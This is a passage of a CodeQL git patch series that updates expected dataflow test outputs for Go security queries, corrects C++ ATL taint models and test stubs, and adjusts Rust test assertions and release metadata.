provenance | | +| passwords.go:125:2:125:20 | []type{args} [array, y] | passwords.go:118:2:118:7 | definition of config [y] | provenance | | +| passwords.go:125:2:125:20 | []type{args} [array] | passwords.go:118:2:118:7 | definition of config | provenance | | +| passwords.go:125:14:125:19 | config | passwords.go:125:2:125:20 | []type{args} [array] | provenance | | +| passwords.go:125:14:125:19 | config [x] | passwords.go:125:2:125:20 | []type{args} [array, x] | provenance | | +| passwords.go:125:14:125:19 | config [y] | passwords.go:125:2:125:20 | []type{args} [array, y] | provenance | | | passwords.go:126:14:126:19 | config [x] | passwords.go:126:14:126:21 | selection of x | provenance | | | passwords.go:127:14:127:19 | config [y] | passwords.go:127:14:127:21 | selection of y | provenance | | | protobuf.go:11:2:11:6 | definition of query [pointer, Description] | protobuf.go:12:2:12:6 | query [pointer, Description] | provenance | | 
@@ -149,18 +182,29 @@ nodes | passwords.go:32:12:32:19 | password | semmle.label | password | | passwords.go:34:14:34:35 | ...+... | semmle.label | ...+... | | passwords.go:34:28:34:35 | password | semmle.label | password | +| passwords.go:36:2:36:5 | definition of obj1 | semmle.label | definition of obj1 | | passwords.go:36:10:38:2 | struct literal | semmle.label | struct literal | | passwords.go:37:13:37:13 | x | semmle.label | x | +| passwords.go:39:2:39:18 | []type{args} [array] | semmle.label | []type{args} [array] | | passwords.go:39:14:39:17 | obj1 | semmle.label | obj1 | +| passwords.go:39:14:39:17 | obj1 | semmle.label | obj1 | +| passwords.go:41:2:41:5 | definition of obj2 | semmle.label | definition of obj2 | | passwords.go:41:10:43:2 | struct literal | semmle.label | struct literal | | passwords.go:42:6:42:13 | password | semmle.label | password | +| passwords.go:44:2:44:18 | []type{args} [array] | semmle.label | []type{args} [array] | +| passwords.go:44:14:44:17 | obj2 | semmle.label | obj2 | | passwords.go:44:14:44:17 | obj2 | semmle.label | obj2 | | passwords.go:46:6:46:9 | definition of obj3 | semmle.label | definition of obj3 | +| passwords.go:47:2:47:18 | []type{args} [array] | semmle.label | []type{args} [array] | +| passwords.go:47:14:47:17 | obj3 | semmle.label | obj3 | | passwords.go:47:14:47:17 | obj3 | semmle.label | obj3 | | passwords.go:48:11:48:18 | password | semmle.label | password | | passwords.go:51:14:51:27 | fixed_password | semmle.label | fixed_password | +| passwords.go:85:2:85:14 | definition of utilityObject | semmle.label | definition of utilityObject | | passwords.go:85:19:87:2 | struct literal | semmle.label | struct literal | | passwords.go:86:16:86:36 | call to make | semmle.label | call to make | +| passwords.go:88:2:88:27 | []type{args} [array] | semmle.label | []type{args} [array] | +| passwords.go:88:14:88:26 | utilityObject | semmle.label | utilityObject | | passwords.go:88:14:88:26 | utilityObject | semmle.label | 
utilityObject | | passwords.go:90:12:90:19 | password | semmle.label | password | | passwords.go:91:23:91:28 | secret | semmle.label | secret | @@ -173,13 +217,22 @@ nodes | passwords.go:116:14:116:45 | ...+... | semmle.label | ...+... | | passwords.go:116:28:116:36 | password1 | semmle.label | password1 | | passwords.go:116:28:116:45 | call to String | semmle.label | call to String | +| passwords.go:118:2:118:7 | definition of config | semmle.label | definition of config | +| passwords.go:118:2:118:7 | definition of config [x] | semmle.label | definition of config [x] | +| passwords.go:118:2:118:7 | definition of config [y] | semmle.label | definition of config [y] | | passwords.go:118:12:123:2 | struct literal | semmle.label | struct literal | | passwords.go:118:12:123:2 | struct literal [x] | semmle.label | struct literal [x] | | passwords.go:118:12:123:2 | struct literal [y] | semmle.label | struct literal [y] | | passwords.go:119:13:119:13 | x | semmle.label | x | | passwords.go:121:13:121:20 | password | semmle.label | password | | passwords.go:122:13:122:25 | call to getPassword | semmle.label | call to getPassword | +| passwords.go:125:2:125:20 | []type{args} [array, x] | semmle.label | []type{args} [array, x] | +| passwords.go:125:2:125:20 | []type{args} [array, y] | semmle.label | []type{args} [array, y] | +| passwords.go:125:2:125:20 | []type{args} [array] | semmle.label | []type{args} [array] | | passwords.go:125:14:125:19 | config | semmle.label | config | +| passwords.go:125:14:125:19 | config | semmle.label | config | +| passwords.go:125:14:125:19 | config [x] | semmle.label | config [x] | +| passwords.go:125:14:125:19 | config [y] | semmle.label | config [y] | | passwords.go:126:14:126:19 | config [x] | semmle.label | config [x] | | passwords.go:126:14:126:21 | selection of x | semmle.label | selection of x | | passwords.go:127:14:127:19 | config [y] | semmle.label | config [y] | 
diff --git a/go/ql/test/query-tests/Security/CWE-640/EmailInjection.expected b/go/ql/test/query-tests/Security/CWE-640/EmailInjection.expected index ac5985f110d..b729c7baf83 100644 --- a/go/ql/test/query-tests/Security/CWE-640/EmailInjection.expected +++ b/go/ql/test/query-tests/Security/CWE-640/EmailInjection.expected 
@@ -19,17 +19,41 @@ edges | main.go:46:21:46:31 | call to Referer | main.go:52:46:52:59 | untrustedInput | provenance | Src:MaD:2 | | main.go:46:21:46:31 | call to Referer | main.go:53:52:53:65 | untrustedInput | provenance | Src:MaD:2 | | main.go:58:21:58:31 | call to Referer | main.go:60:47:60:60 | untrustedInput | provenance | Src:MaD:2 | +| main.go:60:3:60:9 | definition of content | main.go:63:16:63:22 | content | provenance | | +| main.go:60:3:60:9 | definition of content | main.go:63:16:63:22 | content | provenance | | +| main.go:60:14:60:61 | call to NewContent | main.go:63:16:63:22 | content | provenance | | | main.go:60:14:60:61 | call to NewContent | main.go:63:16:63:22 | content | provenance | | | main.go:60:47:60:60 | untrustedInput | main.go:60:14:60:61 | call to NewContent | provenance | MaD:3 | +| main.go:63:3:63:23 | []type{args} [array] | main.go:60:3:60:9 | definition of content | provenance | | +| main.go:63:16:63:22 | content | main.go:63:3:63:23 | []type{args} [array] | provenance | | | main.go:68:21:68:31 | call to Referer | main.go:74:47:74:60 | untrustedInput | provenance | Src:MaD:2 | +| main.go:74:3:74:9 | definition of content | main.go:76:50:76:56 | content | provenance | | +| main.go:74:3:74:9 | definition of content | main.go:76:50:76:56 | content | provenance | | +| main.go:74:3:74:9 | definition of content | main.go:76:59:76:65 | content | provenance | | +| main.go:74:3:74:9 | definition of content | main.go:76:59:76:65 | content | provenance | | +| main.go:74:3:74:9 | definition of content | main.go:77:16:77:22 | content | provenance | | +| main.go:74:3:74:9 | definition of content | main.go:77:16:77:22 | content | provenance | | +| main.go:74:14:74:61 | call to NewContent | main.go:76:50:76:56 | content | provenance | | | main.go:74:14:74:61 | call to NewContent | main.go:76:50:76:56 | content | provenance | | | main.go:74:14:74:61 | call to NewContent | main.go:76:59:76:65 | content | provenance | | +| main.go:74:14:74:61 | call 
to NewContent | main.go:76:59:76:65 | content | provenance | | +| main.go:74:14:74:61 | call to NewContent | main.go:77:16:77:22 | content | provenance | | | main.go:74:14:74:61 | call to NewContent | main.go:77:16:77:22 | content | provenance | | | main.go:74:47:74:60 | untrustedInput | main.go:74:14:74:61 | call to NewContent | provenance | MaD:3 | +| main.go:76:8:76:66 | []type{args} [array] | main.go:74:3:74:9 | definition of content | provenance | | +| main.go:76:50:76:56 | content | main.go:76:8:76:66 | []type{args} [array] | provenance | | +| main.go:76:59:76:65 | content | main.go:76:8:76:66 | []type{args} [array] | provenance | | +| main.go:77:3:77:23 | []type{args} [array] | main.go:74:3:74:9 | definition of content | provenance | | +| main.go:77:16:77:22 | content | main.go:77:3:77:23 | []type{args} [array] | provenance | | | main.go:82:21:82:31 | call to Referer | main.go:89:37:89:50 | untrustedInput | provenance | Src:MaD:2 | | main.go:82:21:82:31 | call to Referer | main.go:91:48:91:61 | untrustedInput | provenance | Src:MaD:2 | +| main.go:91:3:91:10 | definition of content2 | main.go:93:16:93:23 | content2 | provenance | | +| main.go:91:3:91:10 | definition of content2 | main.go:93:16:93:23 | content2 | provenance | | +| main.go:91:15:91:62 | call to NewContent | main.go:93:16:93:23 | content2 | provenance | | | main.go:91:15:91:62 | call to NewContent | main.go:93:16:93:23 | content2 | provenance | | | main.go:91:48:91:61 | untrustedInput | main.go:91:15:91:62 | call to NewContent | provenance | MaD:3 | +| main.go:93:3:93:24 | []type{args} [array] | main.go:91:3:91:10 | definition of content2 | provenance | | +| main.go:93:16:93:23 | content2 | main.go:93:3:93:24 | []type{args} [array] | provenance | | models | 1 | Source: net/http; Request; true; Header; ; ; ; remote; manual | | 2 | Source: net/http; Request; true; Referer; ; ; ReturnValue; remote; manual | 
@@ -49,18 +73,30 @@ nodes | main.go:52:46:52:59 | untrustedInput | semmle.label | untrustedInput | | main.go:53:52:53:65 | untrustedInput | semmle.label | untrustedInput | | main.go:58:21:58:31 | call to Referer | semmle.label | call to Referer | +| main.go:60:3:60:9 | definition of content | semmle.label | definition of content | | main.go:60:14:60:61 | call to NewContent | semmle.label | call to NewContent | | main.go:60:47:60:60 | untrustedInput | semmle.label | untrustedInput | +| main.go:63:3:63:23 | []type{args} [array] | semmle.label | []type{args} [array] | +| main.go:63:16:63:22 | content | semmle.label | content | | main.go:63:16:63:22 | content | semmle.label | content | | main.go:68:21:68:31 | call to Referer | semmle.label | call to Referer | +| main.go:74:3:74:9 | definition of content | semmle.label | definition of content | | main.go:74:14:74:61 | call to NewContent | semmle.label | call to NewContent | | main.go:74:47:74:60 | untrustedInput | semmle.label | untrustedInput | +| main.go:76:8:76:66 | []type{args} [array] | semmle.label | []type{args} [array] | +| main.go:76:50:76:56 | content | semmle.label | content | | main.go:76:50:76:56 | content | semmle.label | content | | main.go:76:59:76:65 | content | semmle.label | content | +| main.go:76:59:76:65 | content | semmle.label | content | +| main.go:77:3:77:23 | []type{args} [array] | semmle.label | []type{args} [array] | +| main.go:77:16:77:22 | content | semmle.label | content | | main.go:77:16:77:22 | content | semmle.label | content | | main.go:82:21:82:31 | call to Referer | semmle.label | call to Referer | | main.go:89:37:89:50 | untrustedInput | semmle.label | untrustedInput | +| main.go:91:3:91:10 | definition of content2 | semmle.label | definition of content2 | | main.go:91:15:91:62 | call to NewContent | semmle.label | call to NewContent | | main.go:91:48:91:61 | untrustedInput | semmle.label | untrustedInput | +| main.go:93:3:93:24 | []type{args} [array] | semmle.label | []type{args} 
[array] | +| main.go:93:16:93:23 | content2 | semmle.label | content2 | | main.go:93:16:93:23 | content2 | semmle.label | content2 | subpaths From 3d0a2057f61d9564e7741f638214d650ac646a67 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Fri, 6 Dec 2024 15:46:14 +0000 Subject: [PATCH 0908/1267] C++: Fix 'BSTRToArray' stub and MaD model. --- cpp/ql/lib/ext/CComBSTR.model.yml | 2 +- .../dataflow/external-models/flow.expected | 10 +++++----- cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp | 6 +++--- .../dataflow/taint-tests/localTaint.expected | 4 ++-- .../dataflow/taint-tests/test_mad-signatures.expected | 2 +- 5 files changed, 12 insertions(+), 12 deletions(-) diff --git a/cpp/ql/lib/ext/CComBSTR.model.yml b/cpp/ql/lib/ext/CComBSTR.model.yml index 1865a244ef3..d31f3e36a51 100644 --- a/cpp/ql/lib/ext/CComBSTR.model.yml +++ b/cpp/ql/lib/ext/CComBSTR.model.yml @@ -20,7 +20,7 @@ extensions: - ["", "CComBSTR", True, "ArrayToBSTR", "", "", "Argument[*0].Field[*pvData]", "Argument[-1]", "value", "manual"] - ["", "CComBSTR", True, "AssignBSTR", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - ["", "CComBSTR", True, "Attach", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CComBSTR", True, "BSTRToArray", "", "", "Argument[-1]", "Argument[*0].Field[*pvData]", "value", "manual"] + - ["", "CComBSTR", True, "BSTRToArray", "", "", "Argument[-1]", "Argument[**0].Field[*pvData]", "value", "manual"] - ["", "CComBSTR", True, "Copy", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] - ["", "CComBSTR", True, "CopyTo", "", "", "Argument[-1]", "Argument[*0]", "value", "manual"] - ["", "CComBSTR", True, "LoadString", "(HINSTANCE,UINT)", "", "Argument[1]", "Argument[-1]", "taint", "manual"] diff --git a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected index 137642d522a..81a9c605f00 100644 
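Review bot: The `BSTRToArray` row in CComBSTR.model.yml now writes to `Argument[**0].Field[*pvData]`, but nothing in the file says why this one row needs two levels of indirection when its neighbours use one, so it reads like a typo. The atl.cpp stub changed in the same commit declares the parameter as `LPSAFEARRAY* ppArray`, a pointer to a pointer, whereas `ArrayToBSTR` takes `const SAFEARRAY*` and correctly stays at `Argument[*0]`. I would add a comment above the row, for example `# BSTRToArray takes LPSAFEARRAY* (pointer to SAFEARRAY*), hence Argument[**0]`. Without it, a later edit that "normalises" the row back to `*0` would silently drop the modelled flow from the BSTR into `pvData`. The rest of the model list lies outside this hunk.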
--- a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected 
@@ -11,14 +11,14 @@ edges | asio_streams.cpp:100:44:100:62 | call to buffer | asio_streams.cpp:103:29:103:39 | *send_buffer | provenance | Sink:MaD:6 | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | provenance | | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:100:44:100:62 | call to buffer | provenance | MaD:10 | -| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:801 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:799 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:800 | +| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:800 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:798 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:799 | | test.cpp:7:10:7:18 | call to ymlSource | test.cpp:13:18:13:18 | x | provenance | | | test.cpp:13:10:13:16 | call to ymlStep | test.cpp:13:10:13:16 | call to ymlStep | provenance | | -| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:800 | +| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:799 | | test.cpp:13:18:13:18 | x | test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | provenance | | -| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:801 | +| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:800 | nodes | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | semmle.label | [summary param] *0 in buffer | | asio_streams.cpp:56:18:56:23 | [summary] to write: ReturnValue in buffer | semmle.label | [summary] to write: 
ReturnValue in buffer | diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 05d14c06c36..9a57fd604a5 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -426,7 +426,7 @@ struct CComBSTR { HRESULT ArrayToBSTR(const SAFEARRAY* pSrc) throw(); HRESULT AssignBSTR(const BSTR bstrSrc) throw(); void Attach(BSTR src) throw(); - HRESULT BSTRToArray(LPSAFEARRAY ppArray) throw(); + HRESULT BSTRToArray(LPSAFEARRAY* ppArray) throw(); unsigned int ByteLength() const throw(); BSTR Copy() const throw(); HRESULT CopyTo(BSTR* pbstr) throw(); @@ -504,10 +504,10 @@ void test_CComBSTR() { sink(b8.m_str); // $ ir CComBSTR b9; - SAFEARRAY safe; + LPSAFEARRAY safe; b9.Append(source()); b9.BSTRToArray(&safe); - sink(safe.pvData); // $ ir + sink(safe->pvData); // $ ir sink(b9.Copy()); // $ ir } diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected index a35e1c53d1c..d3ee7b7c089 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected 
@@ -606,8 +606,8 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:506:14:506:15 | call to CComBSTR | atl.cpp:509:5:509:6 | b9 | | | atl.cpp:506:14:506:15 | call to CComBSTR | atl.cpp:512:10:512:11 | b9 | | | atl.cpp:506:14:506:15 | call to CComBSTR | atl.cpp:513:3:513:3 | b9 | | -| atl.cpp:507:15:507:18 | safe | atl.cpp:509:21:509:24 | safe | | -| atl.cpp:507:15:507:18 | safe | atl.cpp:510:10:510:13 | safe | | +| atl.cpp:507:17:507:20 | safe | atl.cpp:509:21:509:24 | safe | | +| atl.cpp:507:17:507:20 | safe | atl.cpp:510:10:510:13 | safe | | | atl.cpp:508:5:508:6 | ref arg b9 | atl.cpp:509:5:509:6 | b9 | | | atl.cpp:508:5:508:6 | ref arg b9 | atl.cpp:512:10:512:11 | b9 | | | atl.cpp:508:5:508:6 | ref arg b9 | atl.cpp:513:3:513:3 | b9 | | diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected index f1e4b841d87..6627139ae6e 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected @@ -613,7 +613,7 @@ getParameterTypeName | atl.cpp:426:11:426:21 | ArrayToBSTR | 0 | const SAFEARRAY * | | atl.cpp:427:11:427:20 | AssignBSTR | 0 | const BSTR | | atl.cpp:428:8:428:13 | Attach | 0 | BSTR | -| atl.cpp:429:11:429:21 | BSTRToArray | 0 | LPSAFEARRAY | +| atl.cpp:429:11:429:21 | BSTRToArray | 0 | LPSAFEARRAY * | | atl.cpp:432:11:432:16 | CopyTo | 0 | BSTR * | | atl.cpp:434:11:434:16 | CopyTo | 0 | VARIANT * | | atl.cpp:438:8:438:17 | LoadString | 0 | HINSTANCE | From 1ceee769199a6a8d0572c816a8b63d0f415ff2d9 Mon Sep 17 00:00:00 2001 
From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 6 Dec 2024 15:52:08 +0000 Subject: [PATCH 0909/1267] Rust: Get the .expected values right this time. --- rust/ql/integration-tests/hello-project/summary.expected | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rust/ql/integration-tests/hello-project/summary.expected b/rust/ql/integration-tests/hello-project/summary.expected index 6912eb2c52d..5972bf15827 100644 --- a/rust/ql/integration-tests/hello-project/summary.expected +++ b/rust/ql/integration-tests/hello-project/summary.expected @@ -5,7 +5,7 @@ | Files extracted - total | 5 | | Files extracted - with errors | 1 | | Files extracted - without errors | 4 | -| Files extracted - without errors % | 100 | +| Files extracted - without errors % | 80 | | Inconsistencies - AST | 0 | | Inconsistencies - CFG | 0 | | Inconsistencies - data flow | 0 | From 59f4b3c0db3d12177b34950c0070af798f8fa7e2 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Fri, 6 Dec 2024 15:58:07 +0000 Subject: [PATCH 0910/1267] C++: Get rid of the model for 'Create'. --- cpp/ql/lib/ext/CComSafeArray.model.yml | 1 - .../dataflow/external-models/flow.expected | 10 +++++----- .../dataflow/external-models/validatemodels.expected | 1 - .../dataflow/taint-tests/test_mad-signatures.expected | 3 --- 4 files changed, 5 insertions(+), 10 deletions(-) diff --git a/cpp/ql/lib/ext/CComSafeArray.model.yml b/cpp/ql/lib/ext/CComSafeArray.model.yml index 8da350ff140..61aec61e7d2 100644 --- a/cpp/ql/lib/ext/CComSafeArray.model.yml +++ b/cpp/ql/lib/ext/CComSafeArray.model.yml 
@@ -11,7 +11,6 @@ extensions: - ["", "CComSafeArray", True, "Attach", "", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] - ["", "CComSafeArray", True, "CopyFrom", "", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] - ["", "CComSafeArray", True, "CopyTo", "", "", "Argument[-1].Field[*m_psa]", "Argument[*0]", "value", "manual"] - - ["", "CComSafeArray", True, "Create", "(const SAFEARRAYBOUND *,UINT)", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] - ["", "CComSafeArray", True, "GetAt", "", "", "Argument[-1].Field[*m_psa].Field[*@pvData]", "ReturnValue[*@]", "value", "manual"] - ["", "CComSafeArray", True, "GetLowerBound", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["", "CComSafeArray", True, "GetSafeArrayPtr", "", "", "Argument[-1].Field[*m_psa]", "ReturnValue[*]", "value", "manual"] diff --git a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected index 81a9c605f00..8930cadb8d8 100644 --- a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected 
@@ -11,14 +11,14 @@ edges | asio_streams.cpp:100:44:100:62 | call to buffer | asio_streams.cpp:103:29:103:39 | *send_buffer | provenance | Sink:MaD:6 | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | provenance | | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:100:44:100:62 | call to buffer | provenance | MaD:10 | -| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:800 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:798 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:799 | +| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:799 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:797 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:798 | | test.cpp:7:10:7:18 | call to ymlSource | test.cpp:13:18:13:18 | x | provenance | | | test.cpp:13:10:13:16 | call to ymlStep | test.cpp:13:10:13:16 | call to ymlStep | provenance | | -| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:799 | +| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:798 | | test.cpp:13:18:13:18 | x | test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | provenance | | -| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:800 | +| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:799 | nodes | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | semmle.label | [summary param] *0 in buffer | | asio_streams.cpp:56:18:56:23 | [summary] to write: ReturnValue in buffer | semmle.label | [summary] to write: 
ReturnValue in buffer | diff --git a/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected b/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected index 7b089db8a6d..423e238ecd7 100644 --- a/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected @@ -21,7 +21,6 @@ | Dubious signature "(const CComSafeArray &)" in summary model. | | Dubious signature "(const SAFEARRAY &)" in summary model. | | Dubious signature "(const SAFEARRAY *)" in summary model. | -| Dubious signature "(const SAFEARRAYBOUND *,UINT)" in summary model. | | Dubious signature "(const T &,BOOL)" in summary model. | | Dubious signature "(const deque &)" in summary model. | | Dubious signature "(const deque &,const Allocator &)" in summary model. | diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected index 6627139ae6e..2d69f088fef 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected @@ -35,7 +35,6 @@ signatureMatches | atl.cpp:426:11:426:21 | ArrayToBSTR | (const SAFEARRAY *) | CComSafeArray | operator= | 0 | | atl.cpp:438:8:438:17 | LoadString | (HINSTANCE,UINT) | CComBSTR | LoadString | 0 | | atl.cpp:438:8:438:17 | LoadString | (HINSTANCE,UINT) | CComBSTR | LoadString | 1 | -| atl.cpp:438:8:438:17 | LoadString | (const SAFEARRAYBOUND *,UINT) | CComSafeArray | Create | 1 | | atl.cpp:439:8:439:17 | LoadString | (UINT) | CComBSTR | LoadString | 0 | | atl.cpp:439:8:439:17 | LoadString | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | | atl.cpp:447:13:447:22 | operator+= | (const CComBSTR &) | CComBSTR | Append | 0 | 
@@ -419,8 +418,6 @@ getSignatureParameterName | (const SAFEARRAY *) | CComSafeArray | Add | 0 | const SAFEARRAY * | | (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | const SAFEARRAY * | | (const SAFEARRAY *) | CComSafeArray | operator= | 0 | const SAFEARRAY * | -| (const SAFEARRAYBOUND *,UINT) | CComSafeArray | Create | 0 | const SAFEARRAYBOUND * | -| (const SAFEARRAYBOUND *,UINT) | CComSafeArray | Create | 1 | UINT | | (const T &,BOOL) | CComSafeArray | Add | 0 | const class:0 & | | (const T &,BOOL) | CComSafeArray | Add | 1 | BOOL | | (const deque &) | deque | deque | 0 | const deque & | From 9b34615a645f420e7d2a6f4dabbdf77baf248d67 Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Fri, 6 Dec 2024 19:05:53 +0100 Subject: [PATCH 0911/1267] Rust: Update test assertions to match results --- rust/ql/test/library-tests/variables/variables.expected | 4 ---- rust/ql/test/library-tests/variables/variables.rs | 6 +++--- 2 files changed, 3 insertions(+), 7 deletions(-) diff --git a/rust/ql/test/library-tests/variables/variables.expected b/rust/ql/test/library-tests/variables/variables.expected index d0141b2e1e8..1e3fc90633c 100644 --- a/rust/ql/test/library-tests/variables/variables.expected +++ b/rust/ql/test/library-tests/variables/variables.expected @@ -1,8 +1,4 @@ testFailures -| variables.rs:493:13:493:16 | self | Unexpected result: read_access=self | -| variables.rs:493:25:493:25 | n | Unexpected result: read_access=n | -| variables.rs:495:9:495:9 | f | Unexpected result: read_access=f | -| variables.rs:496:9:496:9 | f | Unexpected result: read_access=f | variable | variables.rs:3:14:3:14 | s | | variables.rs:7:14:7:14 | i | diff --git a/rust/ql/test/library-tests/variables/variables.rs b/rust/ql/test/library-tests/variables/variables.rs index 73d350f2496..155ebaa8584 100644 --- a/rust/ql/test/library-tests/variables/variables.rs +++ b/rust/ql/test/library-tests/variables/variables.rs 
@@ -490,10 +490,10 @@ impl MyStruct { fn my_method(&mut self) { let mut f = |n| { // Capture of `self` - self.val += n; + self.val += n; // $ read_access=self read_access=n }; - f(3); - f(4); + f(3); // $ read_access=f + f(4); // $ read_access=f } } From 3a3eb001e39523c19365df1706c5d7131b4642e2 Mon Sep 17 00:00:00 2001 From: Jeroen Ketema Date: Fri, 6 Dec 2024 19:53:06 +0100 Subject: [PATCH 0912/1267] C++: Fix word duplication in change note --- .../change-notes/2024-12-05-wrong-number-format-arguments.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/src/change-notes/2024-12-05-wrong-number-format-arguments.md b/cpp/ql/src/change-notes/2024-12-05-wrong-number-format-arguments.md index abae2dfaa3d..6b41378f556 100644 --- a/cpp/ql/src/change-notes/2024-12-05-wrong-number-format-arguments.md +++ b/cpp/ql/src/change-notes/2024-12-05-wrong-number-format-arguments.md @@ -1,4 +1,4 @@ --- category: minorAnalysis --- -* The "Too few arguments to formatting function" query (`cpp/wrong-number-format-arguments`) query no longer produces results if an argument has an extraction error. +* The "Too few arguments to formatting function" query (`cpp/wrong-number-format-arguments`) no longer produces results if an argument has an extraction error. From dbe8f98e183b58c716a44c025dab58ec69b9d65c Mon Sep 17 00:00:00 2001 
From: "github-actions[bot]" Date: Fri, 6 Dec 2024 21:19:19 +0000 Subject: [PATCH 0913/1267] Post-release preparation for codeql-cli-2.20.0 --- cpp/ql/lib/qlpack.yml | 2 +- cpp/ql/src/qlpack.yml | 2 +- csharp/ql/campaigns/Solorigate/lib/qlpack.yml | 2 +- csharp/ql/campaigns/Solorigate/src/qlpack.yml | 2 +- csharp/ql/lib/qlpack.yml | 2 +- csharp/ql/src/qlpack.yml | 2 +- go/ql/consistency-queries/qlpack.yml | 2 +- go/ql/lib/qlpack.yml | 2 +- go/ql/src/qlpack.yml | 2 +- java/ql/lib/qlpack.yml | 2 +- java/ql/src/qlpack.yml | 2 +- javascript/ql/lib/qlpack.yml | 2 +- javascript/ql/src/qlpack.yml | 2 +- misc/suite-helpers/qlpack.yml | 2 +- python/ql/lib/qlpack.yml | 2 +- python/ql/src/qlpack.yml | 2 +- ruby/ql/lib/qlpack.yml | 2 +- ruby/ql/src/qlpack.yml | 2 +- shared/controlflow/qlpack.yml | 2 +- shared/dataflow/qlpack.yml | 2 +- shared/mad/qlpack.yml | 2 +- shared/rangeanalysis/qlpack.yml | 2 +- shared/regex/qlpack.yml | 2 +- shared/ssa/qlpack.yml | 2 +- 